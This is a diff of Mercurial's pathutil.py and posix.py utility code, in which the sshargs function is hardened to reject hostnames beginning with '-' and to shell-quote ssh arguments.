128 except (OSError, error.Abort):
134 except (OSError, error.Abort):
129 return False
135 return False
130
136
131 def canonpath(root, cwd, myname, auditor=None):
137 def canonpath(root, cwd, myname, auditor=None):
132 '''return the canonical path of myname, given cwd and root'''
138 '''return the canonical path of myname, given cwd and root'''
133 if util.endswithsep(root):
139 if util.endswithsep(root):
134 rootsep = root
140 rootsep = root
135 else:
141 else:
136 rootsep = root + pycompat.ossep
142 rootsep = root + pycompat.ossep
137 name = myname
143 name = myname
138 if not os.path.isabs(name):
144 if not os.path.isabs(name):
139 name = os.path.join(root, cwd, name)
145 name = os.path.join(root, cwd, name)
140 name = os.path.normpath(name)
146 name = os.path.normpath(name)
141 if auditor is None:
147 if auditor is None:
142 auditor = pathauditor(root)
148 auditor = pathauditor(root)
143 if name != rootsep and name.startswith(rootsep):
149 if name != rootsep and name.startswith(rootsep):
144 name = name[len(rootsep):]
150 name = name[len(rootsep):]
145 auditor(name)
151 auditor(name)
146 return util.pconvert(name)
152 return util.pconvert(name)
147 elif name == root:
153 elif name == root:
148 return ''
154 return ''
149 else:
155 else:
150 # Determine whether `name' is in the hierarchy at or beneath `root',
156 # Determine whether `name' is in the hierarchy at or beneath `root',
151 # by iterating name=dirname(name) until that causes no change (can't
157 # by iterating name=dirname(name) until that causes no change (can't
152 # check name == '/', because that doesn't work on windows). The list
158 # check name == '/', because that doesn't work on windows). The list
153 # `rel' holds the reversed list of components making up the relative
159 # `rel' holds the reversed list of components making up the relative
154 # file name we want.
160 # file name we want.
155 rel = []
161 rel = []
156 while True:
162 while True:
157 try:
163 try:
158 s = util.samefile(name, root)
164 s = util.samefile(name, root)
159 except OSError:
165 except OSError:
160 s = False
166 s = False
161 if s:
167 if s:
162 if not rel:
168 if not rel:
163 # name was actually the same as root (maybe a symlink)
169 # name was actually the same as root (maybe a symlink)
164 return ''
170 return ''
165 rel.reverse()
171 rel.reverse()
166 name = os.path.join(*rel)
172 name = os.path.join(*rel)
167 auditor(name)
173 auditor(name)
168 return util.pconvert(name)
174 return util.pconvert(name)
169 dirname, basename = util.split(name)
175 dirname, basename = util.split(name)
170 rel.append(basename)
176 rel.append(basename)
171 if dirname == name:
177 if dirname == name:
172 break
178 break
173 name = dirname
179 name = dirname
174
180
175 # A common mistake is to use -R, but specify a file relative to the repo
181 # A common mistake is to use -R, but specify a file relative to the repo
176 # instead of cwd. Detect that case, and provide a hint to the user.
182 # instead of cwd. Detect that case, and provide a hint to the user.
177 hint = None
183 hint = None
178 try:
184 try:
179 if cwd != root:
185 if cwd != root:
180 canonpath(root, root, myname, auditor)
186 canonpath(root, root, myname, auditor)
181 hint = (_("consider using '--cwd %s'")
187 hint = (_("consider using '--cwd %s'")
182 % os.path.relpath(root, cwd))
188 % os.path.relpath(root, cwd))
183 except error.Abort:
189 except error.Abort:
184 pass
190 pass
185
191
186 raise error.Abort(_("%s not under root '%s'") % (myname, root),
192 raise error.Abort(_("%s not under root '%s'") % (myname, root),
187 hint=hint)
193 hint=hint)
188
194
189 def normasprefix(path):
195 def normasprefix(path):
190 '''normalize the specified path as path prefix
196 '''normalize the specified path as path prefix
191
197
192 Returned value can be used safely for "p.startswith(prefix)",
198 Returned value can be used safely for "p.startswith(prefix)",
193 "p[len(prefix):]", and so on.
199 "p[len(prefix):]", and so on.
194
200
195 For efficiency, this expects "path" argument to be already
201 For efficiency, this expects "path" argument to be already
196 normalized by "os.path.normpath", "os.path.realpath", and so on.
202 normalized by "os.path.normpath", "os.path.realpath", and so on.
197
203
198 See also issue3033 for detail about need of this function.
204 See also issue3033 for detail about need of this function.
199
205
200 >>> normasprefix('/foo/bar').replace(os.sep, '/')
206 >>> normasprefix('/foo/bar').replace(os.sep, '/')
201 '/foo/bar/'
207 '/foo/bar/'
202 >>> normasprefix('/').replace(os.sep, '/')
208 >>> normasprefix('/').replace(os.sep, '/')
203 '/'
209 '/'
204 '''
210 '''
205 d, p = os.path.splitdrive(path)
211 d, p = os.path.splitdrive(path)
206 if len(p) != len(pycompat.ossep):
212 if len(p) != len(pycompat.ossep):
207 return path + pycompat.ossep
213 return path + pycompat.ossep
208 else:
214 else:
209 return path
215 return path
210
216
211 # forward two methods from posixpath that do what we need, but we'd
217 # forward two methods from posixpath that do what we need, but we'd
212 # rather not let our internals know that we're thinking in posix terms
218 # rather not let our internals know that we're thinking in posix terms
213 # - instead we'll let them be oblivious.
219 # - instead we'll let them be oblivious.
214 join = posixpath.join
220 join = posixpath.join
215 dirname = posixpath.dirname
221 dirname = posixpath.dirname
@@ -1,668 +1,675 b''
1 # posix.py - Posix utility function implementations for Mercurial
1 # posix.py - Posix utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import fcntl
11 import fcntl
12 import getpass
12 import getpass
13 import grp
13 import grp
14 import os
14 import os
15 import pwd
15 import pwd
16 import re
16 import re
17 import select
17 import select
18 import stat
18 import stat
19 import sys
19 import sys
20 import tempfile
20 import tempfile
21 import unicodedata
21 import unicodedata
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 encoding,
25 encoding,
26 error,
26 pycompat,
27 pycompat,
27 )
28 )
28
29
29 posixfile = open
30 posixfile = open
30 normpath = os.path.normpath
31 normpath = os.path.normpath
31 samestat = os.path.samestat
32 samestat = os.path.samestat
32 try:
33 try:
33 oslink = os.link
34 oslink = os.link
34 except AttributeError:
35 except AttributeError:
35 # Some platforms build Python without os.link on systems that are
36 # Some platforms build Python without os.link on systems that are
36 # vaguely unix-like but don't have hardlink support. For those
37 # vaguely unix-like but don't have hardlink support. For those
37 # poor souls, just say we tried and that it failed so we fall back
38 # poor souls, just say we tried and that it failed so we fall back
38 # to copies.
39 # to copies.
39 def oslink(src, dst):
40 def oslink(src, dst):
40 raise OSError(errno.EINVAL,
41 raise OSError(errno.EINVAL,
41 'hardlinks not supported: %s to %s' % (src, dst))
42 'hardlinks not supported: %s to %s' % (src, dst))
42 unlink = os.unlink
43 unlink = os.unlink
43 rename = os.rename
44 rename = os.rename
44 removedirs = os.removedirs
45 removedirs = os.removedirs
45 expandglobs = False
46 expandglobs = False
46
47
47 umask = os.umask(0)
48 umask = os.umask(0)
48 os.umask(umask)
49 os.umask(umask)
49
50
50 def split(p):
51 def split(p):
51 '''Same as posixpath.split, but faster
52 '''Same as posixpath.split, but faster
52
53
53 >>> import posixpath
54 >>> import posixpath
54 >>> for f in ['/absolute/path/to/file',
55 >>> for f in ['/absolute/path/to/file',
55 ... 'relative/path/to/file',
56 ... 'relative/path/to/file',
56 ... 'file_alone',
57 ... 'file_alone',
57 ... 'path/to/directory/',
58 ... 'path/to/directory/',
58 ... '/multiple/path//separators',
59 ... '/multiple/path//separators',
59 ... '/file_at_root',
60 ... '/file_at_root',
60 ... '///multiple_leading_separators_at_root',
61 ... '///multiple_leading_separators_at_root',
61 ... '']:
62 ... '']:
62 ... assert split(f) == posixpath.split(f), f
63 ... assert split(f) == posixpath.split(f), f
63 '''
64 '''
64 ht = p.rsplit('/', 1)
65 ht = p.rsplit('/', 1)
65 if len(ht) == 1:
66 if len(ht) == 1:
66 return '', p
67 return '', p
67 nh = ht[0].rstrip('/')
68 nh = ht[0].rstrip('/')
68 if nh:
69 if nh:
69 return nh, ht[1]
70 return nh, ht[1]
70 return ht[0] + '/', ht[1]
71 return ht[0] + '/', ht[1]
71
72
72 def openhardlinks():
73 def openhardlinks():
73 '''return true if it is safe to hold open file handles to hardlinks'''
74 '''return true if it is safe to hold open file handles to hardlinks'''
74 return True
75 return True
75
76
76 def nlinks(name):
77 def nlinks(name):
77 '''return number of hardlinks for the given file'''
78 '''return number of hardlinks for the given file'''
78 return os.lstat(name).st_nlink
79 return os.lstat(name).st_nlink
79
80
80 def parsepatchoutput(output_line):
81 def parsepatchoutput(output_line):
81 """parses the output produced by patch and returns the filename"""
82 """parses the output produced by patch and returns the filename"""
82 pf = output_line[14:]
83 pf = output_line[14:]
83 if pycompat.sysplatform == 'OpenVMS':
84 if pycompat.sysplatform == 'OpenVMS':
84 if pf[0] == '`':
85 if pf[0] == '`':
85 pf = pf[1:-1] # Remove the quotes
86 pf = pf[1:-1] # Remove the quotes
86 else:
87 else:
87 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 pf = pf[1:-1] # Remove the quotes
89 pf = pf[1:-1] # Remove the quotes
89 return pf
90 return pf
90
91
91 def sshargs(sshcmd, host, user, port):
92 def sshargs(sshcmd, host, user, port):
92 '''Build argument list for ssh'''
93 '''Build argument list for ssh'''
93 args = user and ("%s@%s" % (user, host)) or host
94 args = user and ("%s@%s" % (user, host)) or host
94 return port and ("%s -p %s" % (args, port)) or args
95 if '-' in args[:1]:
96 raise error.Abort(
97 _('illegal ssh hostname or username starting with -: %s') % args)
98 args = shellquote(args)
99 if port:
100 args = '-p %s %s' % (shellquote(port), args)
101 return args
95
102
96 def isexec(f):
103 def isexec(f):
97 """check whether a file is executable"""
104 """check whether a file is executable"""
98 return (os.lstat(f).st_mode & 0o100 != 0)
105 return (os.lstat(f).st_mode & 0o100 != 0)
99
106
100 def setflags(f, l, x):
107 def setflags(f, l, x):
101 st = os.lstat(f)
108 st = os.lstat(f)
102 s = st.st_mode
109 s = st.st_mode
103 if l:
110 if l:
104 if not stat.S_ISLNK(s):
111 if not stat.S_ISLNK(s):
105 # switch file to link
112 # switch file to link
106 fp = open(f)
113 fp = open(f)
107 data = fp.read()
114 data = fp.read()
108 fp.close()
115 fp.close()
109 unlink(f)
116 unlink(f)
110 try:
117 try:
111 os.symlink(data, f)
118 os.symlink(data, f)
112 except OSError:
119 except OSError:
113 # failed to make a link, rewrite file
120 # failed to make a link, rewrite file
114 fp = open(f, "w")
121 fp = open(f, "w")
115 fp.write(data)
122 fp.write(data)
116 fp.close()
123 fp.close()
117 # no chmod needed at this point
124 # no chmod needed at this point
118 return
125 return
119 if stat.S_ISLNK(s):
126 if stat.S_ISLNK(s):
120 # switch link to file
127 # switch link to file
121 data = os.readlink(f)
128 data = os.readlink(f)
122 unlink(f)
129 unlink(f)
123 fp = open(f, "w")
130 fp = open(f, "w")
124 fp.write(data)
131 fp.write(data)
125 fp.close()
132 fp.close()
126 s = 0o666 & ~umask # avoid restatting for chmod
133 s = 0o666 & ~umask # avoid restatting for chmod
127
134
128 sx = s & 0o100
135 sx = s & 0o100
129 if st.st_nlink > 1 and bool(x) != bool(sx):
136 if st.st_nlink > 1 and bool(x) != bool(sx):
130 # the file is a hardlink, break it
137 # the file is a hardlink, break it
131 with open(f, "rb") as fp:
138 with open(f, "rb") as fp:
132 data = fp.read()
139 data = fp.read()
133 unlink(f)
140 unlink(f)
134 with open(f, "wb") as fp:
141 with open(f, "wb") as fp:
135 fp.write(data)
142 fp.write(data)
136
143
137 if x and not sx:
144 if x and not sx:
138 # Turn on +x for every +r bit when making a file executable
145 # Turn on +x for every +r bit when making a file executable
139 # and obey umask.
146 # and obey umask.
140 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
141 elif not x and sx:
148 elif not x and sx:
142 # Turn off all +x bits
149 # Turn off all +x bits
143 os.chmod(f, s & 0o666)
150 os.chmod(f, s & 0o666)
144
151
145 def copymode(src, dst, mode=None):
152 def copymode(src, dst, mode=None):
146 '''Copy the file mode from the file at path src to dst.
153 '''Copy the file mode from the file at path src to dst.
147 If src doesn't exist, we're using mode instead. If mode is None, we're
154 If src doesn't exist, we're using mode instead. If mode is None, we're
148 using umask.'''
155 using umask.'''
149 try:
156 try:
150 st_mode = os.lstat(src).st_mode & 0o777
157 st_mode = os.lstat(src).st_mode & 0o777
151 except OSError as inst:
158 except OSError as inst:
152 if inst.errno != errno.ENOENT:
159 if inst.errno != errno.ENOENT:
153 raise
160 raise
154 st_mode = mode
161 st_mode = mode
155 if st_mode is None:
162 if st_mode is None:
156 st_mode = ~umask
163 st_mode = ~umask
157 st_mode &= 0o666
164 st_mode &= 0o666
158 os.chmod(dst, st_mode)
165 os.chmod(dst, st_mode)
159
166
160 def checkexec(path):
167 def checkexec(path):
161 """
168 """
162 Check whether the given path is on a filesystem with UNIX-like exec flags
169 Check whether the given path is on a filesystem with UNIX-like exec flags
163
170
164 Requires a directory (like /foo/.hg)
171 Requires a directory (like /foo/.hg)
165 """
172 """
166
173
167 # VFAT on some Linux versions can flip mode but it doesn't persist
174 # VFAT on some Linux versions can flip mode but it doesn't persist
168 # a FS remount. Frequently we can detect it if files are created
175 # a FS remount. Frequently we can detect it if files are created
169 # with exec bit on.
176 # with exec bit on.
170
177
171 try:
178 try:
172 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
173 cachedir = os.path.join(path, '.hg', 'cache')
180 cachedir = os.path.join(path, '.hg', 'cache')
174 if os.path.isdir(cachedir):
181 if os.path.isdir(cachedir):
175 checkisexec = os.path.join(cachedir, 'checkisexec')
182 checkisexec = os.path.join(cachedir, 'checkisexec')
176 checknoexec = os.path.join(cachedir, 'checknoexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
177
184
178 try:
185 try:
179 m = os.stat(checkisexec).st_mode
186 m = os.stat(checkisexec).st_mode
180 except OSError as e:
187 except OSError as e:
181 if e.errno != errno.ENOENT:
188 if e.errno != errno.ENOENT:
182 raise
189 raise
183 # checkisexec does not exist - fall through ...
190 # checkisexec does not exist - fall through ...
184 else:
191 else:
185 # checkisexec exists, check if it actually is exec
192 # checkisexec exists, check if it actually is exec
186 if m & EXECFLAGS != 0:
193 if m & EXECFLAGS != 0:
187 # ensure checkisexec exists, check it isn't exec
194 # ensure checkisexec exists, check it isn't exec
188 try:
195 try:
189 m = os.stat(checknoexec).st_mode
196 m = os.stat(checknoexec).st_mode
190 except OSError as e:
197 except OSError as e:
191 if e.errno != errno.ENOENT:
198 if e.errno != errno.ENOENT:
192 raise
199 raise
193 open(checknoexec, 'w').close() # might fail
200 open(checknoexec, 'w').close() # might fail
194 m = os.stat(checknoexec).st_mode
201 m = os.stat(checknoexec).st_mode
195 if m & EXECFLAGS == 0:
202 if m & EXECFLAGS == 0:
196 # check-exec is exec and check-no-exec is not exec
203 # check-exec is exec and check-no-exec is not exec
197 return True
204 return True
198 # checknoexec exists but is exec - delete it
205 # checknoexec exists but is exec - delete it
199 unlink(checknoexec)
206 unlink(checknoexec)
200 # checkisexec exists but is not exec - delete it
207 # checkisexec exists but is not exec - delete it
201 unlink(checkisexec)
208 unlink(checkisexec)
202
209
203 # check using one file, leave it as checkisexec
210 # check using one file, leave it as checkisexec
204 checkdir = cachedir
211 checkdir = cachedir
205 else:
212 else:
206 # check directly in path and don't leave checkisexec behind
213 # check directly in path and don't leave checkisexec behind
207 checkdir = path
214 checkdir = path
208 checkisexec = None
215 checkisexec = None
209 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
210 try:
217 try:
211 os.close(fh)
218 os.close(fh)
212 m = os.stat(fn).st_mode
219 m = os.stat(fn).st_mode
213 if m & EXECFLAGS == 0:
220 if m & EXECFLAGS == 0:
214 os.chmod(fn, m & 0o777 | EXECFLAGS)
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
215 if os.stat(fn).st_mode & EXECFLAGS != 0:
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
216 if checkisexec is not None:
223 if checkisexec is not None:
217 os.rename(fn, checkisexec)
224 os.rename(fn, checkisexec)
218 fn = None
225 fn = None
219 return True
226 return True
220 finally:
227 finally:
221 if fn is not None:
228 if fn is not None:
222 unlink(fn)
229 unlink(fn)
223 except (IOError, OSError):
230 except (IOError, OSError):
224 # we don't care, the user probably won't be able to commit anyway
231 # we don't care, the user probably won't be able to commit anyway
225 return False
232 return False
226
233
227 def checklink(path):
234 def checklink(path):
228 """check whether the given path is on a symlink-capable filesystem"""
235 """check whether the given path is on a symlink-capable filesystem"""
229 # mktemp is not racy because symlink creation will fail if the
236 # mktemp is not racy because symlink creation will fail if the
230 # file already exists
237 # file already exists
231 while True:
238 while True:
232 cachedir = os.path.join(path, '.hg', 'cache')
239 cachedir = os.path.join(path, '.hg', 'cache')
233 checklink = os.path.join(cachedir, 'checklink')
240 checklink = os.path.join(cachedir, 'checklink')
234 # try fast path, read only
241 # try fast path, read only
235 if os.path.islink(checklink):
242 if os.path.islink(checklink):
236 return True
243 return True
237 if os.path.isdir(cachedir):
244 if os.path.isdir(cachedir):
238 checkdir = cachedir
245 checkdir = cachedir
239 else:
246 else:
240 checkdir = path
247 checkdir = path
241 cachedir = None
248 cachedir = None
242 fscheckdir = pycompat.fsdecode(checkdir)
249 fscheckdir = pycompat.fsdecode(checkdir)
243 name = tempfile.mktemp(dir=fscheckdir,
250 name = tempfile.mktemp(dir=fscheckdir,
244 prefix=r'checklink-')
251 prefix=r'checklink-')
245 name = pycompat.fsencode(name)
252 name = pycompat.fsencode(name)
246 try:
253 try:
247 fd = None
254 fd = None
248 if cachedir is None:
255 if cachedir is None:
249 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
250 prefix=r'hg-checklink-')
257 prefix=r'hg-checklink-')
251 target = pycompat.fsencode(os.path.basename(fd.name))
258 target = pycompat.fsencode(os.path.basename(fd.name))
252 else:
259 else:
253 # create a fixed file to link to; doesn't matter if it
260 # create a fixed file to link to; doesn't matter if it
254 # already exists.
261 # already exists.
255 target = 'checklink-target'
262 target = 'checklink-target'
256 try:
263 try:
257 open(os.path.join(cachedir, target), 'w').close()
264 open(os.path.join(cachedir, target), 'w').close()
258 except IOError as inst:
265 except IOError as inst:
259 if inst[0] == errno.EACCES:
266 if inst[0] == errno.EACCES:
260 # If we can't write to cachedir, just pretend
267 # If we can't write to cachedir, just pretend
261 # that the fs is readonly and by association
268 # that the fs is readonly and by association
262 # that the fs won't support symlinks. This
269 # that the fs won't support symlinks. This
263 # seems like the least dangerous way to avoid
270 # seems like the least dangerous way to avoid
264 # data loss.
271 # data loss.
265 return False
272 return False
266 raise
273 raise
267 try:
274 try:
268 os.symlink(target, name)
275 os.symlink(target, name)
269 if cachedir is None:
276 if cachedir is None:
270 unlink(name)
277 unlink(name)
271 else:
278 else:
272 try:
279 try:
273 os.rename(name, checklink)
280 os.rename(name, checklink)
274 except OSError:
281 except OSError:
275 unlink(name)
282 unlink(name)
276 return True
283 return True
277 except OSError as inst:
284 except OSError as inst:
278 # link creation might race, try again
285 # link creation might race, try again
279 if inst[0] == errno.EEXIST:
286 if inst[0] == errno.EEXIST:
280 continue
287 continue
281 raise
288 raise
282 finally:
289 finally:
283 if fd is not None:
290 if fd is not None:
284 fd.close()
291 fd.close()
285 except AttributeError:
292 except AttributeError:
286 return False
293 return False
287 except OSError as inst:
294 except OSError as inst:
288 # sshfs might report failure while successfully creating the link
295 # sshfs might report failure while successfully creating the link
289 if inst[0] == errno.EIO and os.path.exists(name):
296 if inst[0] == errno.EIO and os.path.exists(name):
290 unlink(name)
297 unlink(name)
291 return False
298 return False
292
299
293 def checkosfilename(path):
300 def checkosfilename(path):
294 '''Check that the base-relative path is a valid filename on this platform.
301 '''Check that the base-relative path is a valid filename on this platform.
295 Returns None if the path is ok, or a UI string describing the problem.'''
302 Returns None if the path is ok, or a UI string describing the problem.'''
296 pass # on posix platforms, every path is ok
303 pass # on posix platforms, every path is ok
297
304
298 def setbinary(fd):
305 def setbinary(fd):
299 pass
306 pass
300
307
301 def pconvert(path):
308 def pconvert(path):
302 return path
309 return path
303
310
304 def localpath(path):
311 def localpath(path):
305 return path
312 return path
306
313
307 def samefile(fpath1, fpath2):
314 def samefile(fpath1, fpath2):
308 """Returns whether path1 and path2 refer to the same file. This is only
315 """Returns whether path1 and path2 refer to the same file. This is only
309 guaranteed to work for files, not directories."""
316 guaranteed to work for files, not directories."""
310 return os.path.samefile(fpath1, fpath2)
317 return os.path.samefile(fpath1, fpath2)
311
318
312 def samedevice(fpath1, fpath2):
319 def samedevice(fpath1, fpath2):
313 """Returns whether fpath1 and fpath2 are on the same device. This is only
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
314 guaranteed to work for files, not directories."""
321 guaranteed to work for files, not directories."""
315 st1 = os.lstat(fpath1)
322 st1 = os.lstat(fpath1)
316 st2 = os.lstat(fpath2)
323 st2 = os.lstat(fpath2)
317 return st1.st_dev == st2.st_dev
324 return st1.st_dev == st2.st_dev
318
325
319 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
320 def normcase(path):
327 def normcase(path):
321 return path.lower()
328 return path.lower()
322
329
323 # what normcase does to ASCII strings
330 # what normcase does to ASCII strings
324 normcasespec = encoding.normcasespecs.lower
331 normcasespec = encoding.normcasespecs.lower
325 # fallback normcase function for non-ASCII strings
332 # fallback normcase function for non-ASCII strings
326 normcasefallback = normcase
333 normcasefallback = normcase
327
334
328 if pycompat.sysplatform == 'darwin':
335 if pycompat.sysplatform == 'darwin':
329
336
330 def normcase(path):
337 def normcase(path):
331 '''
338 '''
332 Normalize a filename for OS X-compatible comparison:
339 Normalize a filename for OS X-compatible comparison:
333 - escape-encode invalid characters
340 - escape-encode invalid characters
334 - decompose to NFD
341 - decompose to NFD
335 - lowercase
342 - lowercase
336 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
337
344
338 >>> normcase('UPPER')
345 >>> normcase('UPPER')
339 'upper'
346 'upper'
340 >>> normcase('Caf\xc3\xa9')
347 >>> normcase('Caf\xc3\xa9')
341 'cafe\\xcc\\x81'
348 'cafe\\xcc\\x81'
342 >>> normcase('\xc3\x89')
349 >>> normcase('\xc3\x89')
343 'e\\xcc\\x81'
350 'e\\xcc\\x81'
344 >>> normcase('\xb8\xca\xc3\xca\xbe\xc8.JPG') # issue3918
351 >>> normcase('\xb8\xca\xc3\xca\xbe\xc8.JPG') # issue3918
345 '%b8%ca%c3\\xca\\xbe%c8.jpg'
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
346 '''
353 '''
347
354
348 try:
355 try:
349 return encoding.asciilower(path) # exception for non-ASCII
356 return encoding.asciilower(path) # exception for non-ASCII
350 except UnicodeDecodeError:
357 except UnicodeDecodeError:
351 return normcasefallback(path)
358 return normcasefallback(path)
352
359
353 normcasespec = encoding.normcasespecs.lower
360 normcasespec = encoding.normcasespecs.lower
354
361
355 def normcasefallback(path):
362 def normcasefallback(path):
356 try:
363 try:
357 u = path.decode('utf-8')
364 u = path.decode('utf-8')
358 except UnicodeDecodeError:
365 except UnicodeDecodeError:
359 # OS X percent-encodes any bytes that aren't valid utf-8
366 # OS X percent-encodes any bytes that aren't valid utf-8
360 s = ''
367 s = ''
361 pos = 0
368 pos = 0
362 l = len(path)
369 l = len(path)
363 while pos < l:
370 while pos < l:
364 try:
371 try:
365 c = encoding.getutf8char(path, pos)
372 c = encoding.getutf8char(path, pos)
366 pos += len(c)
373 pos += len(c)
367 except ValueError:
374 except ValueError:
368 c = '%%%02X' % ord(path[pos])
375 c = '%%%02X' % ord(path[pos])
369 pos += 1
376 pos += 1
370 s += c
377 s += c
371
378
372 u = s.decode('utf-8')
379 u = s.decode('utf-8')
373
380
374 # Decompose then lowercase (HFS+ technote specifies lower)
381 # Decompose then lowercase (HFS+ technote specifies lower)
375 enc = unicodedata.normalize('NFD', u).lower().encode('utf-8')
382 enc = unicodedata.normalize('NFD', u).lower().encode('utf-8')
376 # drop HFS+ ignored characters
383 # drop HFS+ ignored characters
377 return encoding.hfsignoreclean(enc)
384 return encoding.hfsignoreclean(enc)
378
385
379 if pycompat.sysplatform == 'cygwin':
386 if pycompat.sysplatform == 'cygwin':
380 # workaround for cygwin, in which mount point part of path is
387 # workaround for cygwin, in which mount point part of path is
381 # treated as case sensitive, even though underlying NTFS is case
388 # treated as case sensitive, even though underlying NTFS is case
382 # insensitive.
389 # insensitive.
383
390
384 # default mount points
391 # default mount points
385 cygwinmountpoints = sorted([
392 cygwinmountpoints = sorted([
386 "/usr/bin",
393 "/usr/bin",
387 "/usr/lib",
394 "/usr/lib",
388 "/cygdrive",
395 "/cygdrive",
389 ], reverse=True)
396 ], reverse=True)
390
397
391 # use upper-ing as normcase as same as NTFS workaround
398 # use upper-ing as normcase as same as NTFS workaround
392 def normcase(path):
399 def normcase(path):
393 pathlen = len(path)
400 pathlen = len(path)
394 if (pathlen == 0) or (path[0] != pycompat.ossep):
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
395 # treat as relative
402 # treat as relative
396 return encoding.upper(path)
403 return encoding.upper(path)
397
404
398 # to preserve case of mountpoint part
405 # to preserve case of mountpoint part
399 for mp in cygwinmountpoints:
406 for mp in cygwinmountpoints:
400 if not path.startswith(mp):
407 if not path.startswith(mp):
401 continue
408 continue
402
409
403 mplen = len(mp)
410 mplen = len(mp)
404 if mplen == pathlen: # mount point itself
411 if mplen == pathlen: # mount point itself
405 return mp
412 return mp
406 if path[mplen] == pycompat.ossep:
413 if path[mplen] == pycompat.ossep:
407 return mp + encoding.upper(path[mplen:])
414 return mp + encoding.upper(path[mplen:])
408
415
409 return encoding.upper(path)
416 return encoding.upper(path)
410
417
411 normcasespec = encoding.normcasespecs.other
418 normcasespec = encoding.normcasespecs.other
412 normcasefallback = normcase
419 normcasefallback = normcase
413
420
414 # Cygwin translates native ACLs to POSIX permissions,
421 # Cygwin translates native ACLs to POSIX permissions,
415 # but these translations are not supported by native
422 # but these translations are not supported by native
416 # tools, so the exec bit tends to be set erroneously.
423 # tools, so the exec bit tends to be set erroneously.
417 # Therefore, disable executable bit access on Cygwin.
424 # Therefore, disable executable bit access on Cygwin.
418 def checkexec(path):
425 def checkexec(path):
419 return False
426 return False
420
427
421 # Similarly, Cygwin's symlink emulation is likely to create
428 # Similarly, Cygwin's symlink emulation is likely to create
422 # problems when Mercurial is used from both Cygwin and native
429 # problems when Mercurial is used from both Cygwin and native
423 # Windows, with other native tools, or on shared volumes
430 # Windows, with other native tools, or on shared volumes
424 def checklink(path):
431 def checklink(path):
425 return False
432 return False
426
433
427 _needsshellquote = None
434 _needsshellquote = None
428 def shellquote(s):
435 def shellquote(s):
429 if pycompat.sysplatform == 'OpenVMS':
436 if pycompat.sysplatform == 'OpenVMS':
430 return '"%s"' % s
437 return '"%s"' % s
431 global _needsshellquote
438 global _needsshellquote
432 if _needsshellquote is None:
439 if _needsshellquote is None:
433 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
434 if s and not _needsshellquote(s):
441 if s and not _needsshellquote(s):
435 # "s" shouldn't have to be quoted
442 # "s" shouldn't have to be quoted
436 return s
443 return s
437 else:
444 else:
438 return "'%s'" % s.replace("'", "'\\''")
445 return "'%s'" % s.replace("'", "'\\''")
439
446
440 def quotecommand(cmd):
447 def quotecommand(cmd):
441 return cmd
448 return cmd
442
449
443 def popen(command, mode='r'):
450 def popen(command, mode='r'):
444 return os.popen(command, mode)
451 return os.popen(command, mode)
445
452
446 def testpid(pid):
453 def testpid(pid):
447 '''return False if pid dead, True if running or not sure'''
454 '''return False if pid dead, True if running or not sure'''
448 if pycompat.sysplatform == 'OpenVMS':
455 if pycompat.sysplatform == 'OpenVMS':
449 return True
456 return True
450 try:
457 try:
451 os.kill(pid, 0)
458 os.kill(pid, 0)
452 return True
459 return True
453 except OSError as inst:
460 except OSError as inst:
454 return inst.errno != errno.ESRCH
461 return inst.errno != errno.ESRCH
455
462
456 def explainexit(code):
463 def explainexit(code):
457 """return a 2-tuple (desc, code) describing a subprocess status
464 """return a 2-tuple (desc, code) describing a subprocess status
458 (codes from kill are negative - not os.system/wait encoding)"""
465 (codes from kill are negative - not os.system/wait encoding)"""
459 if code >= 0:
466 if code >= 0:
460 return _("exited with status %d") % code, code
467 return _("exited with status %d") % code, code
461 return _("killed by signal %d") % -code, -code
468 return _("killed by signal %d") % -code, -code
462
469
463 def isowner(st):
470 def isowner(st):
464 """Return True if the stat object st is from the current user."""
471 """Return True if the stat object st is from the current user."""
465 return st.st_uid == os.getuid()
472 return st.st_uid == os.getuid()
466
473
467 def findexe(command):
474 def findexe(command):
468 '''Find executable for command searching like which does.
475 '''Find executable for command searching like which does.
469 If command is a basename then PATH is searched for command.
476 If command is a basename then PATH is searched for command.
470 PATH isn't searched if command is an absolute or relative path.
477 PATH isn't searched if command is an absolute or relative path.
471 If command isn't found None is returned.'''
478 If command isn't found None is returned.'''
472 if pycompat.sysplatform == 'OpenVMS':
479 if pycompat.sysplatform == 'OpenVMS':
473 return command
480 return command
474
481
475 def findexisting(executable):
482 def findexisting(executable):
476 'Will return executable if existing file'
483 'Will return executable if existing file'
477 if os.path.isfile(executable) and os.access(executable, os.X_OK):
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
478 return executable
485 return executable
479 return None
486 return None
480
487
481 if pycompat.ossep in command:
488 if pycompat.ossep in command:
482 return findexisting(command)
489 return findexisting(command)
483
490
484 if pycompat.sysplatform == 'plan9':
491 if pycompat.sysplatform == 'plan9':
485 return findexisting(os.path.join('/bin', command))
